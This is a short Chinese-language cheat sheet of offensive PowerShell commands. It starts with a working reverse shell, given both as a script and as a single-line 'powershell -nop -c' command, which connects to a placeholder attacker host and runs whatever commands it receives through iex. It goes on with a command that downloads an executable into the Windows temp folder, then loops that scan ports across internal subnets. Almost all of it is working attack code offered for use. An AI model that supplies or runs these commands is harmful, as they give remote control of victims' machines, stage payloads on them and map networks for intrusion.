Powershell反弹命令

$client=New-Object Net.Sockets.TCPClient('x.x.x.x',22);
$stream=$client.GetStream();
[byte[]]$bytes=0..65535|%{0};
while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1 | Out-String);
$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};
$client.Close()

命令行一步到位：

powershell -nop -c "$client=New-Object Net.Sockets.TCPClient('x.x.x.x',8888);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String);$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Powershell下载文件

powershell -nop -c "$client=new-object System.Net.WebClient;$client.DownloadFile('http://x.x.x.x/o.exe', 'c:\windows\temp\o.exe')"

powershell扫描内网某台机器的端口

1..9999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.1",$_)) "Port $_ is open!"} 2>$null

powershell扫描内网范围单一端口

foreach ($ip in 1..255) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}

扫描某个ip段的端口范围

1..255 | % { $a = $_; 1..999 | % {echo ((new-object Net.Sockets.TcpClient).Connect("192.168.0.$a",$_)) "Port $_ is open!"} 2>$null}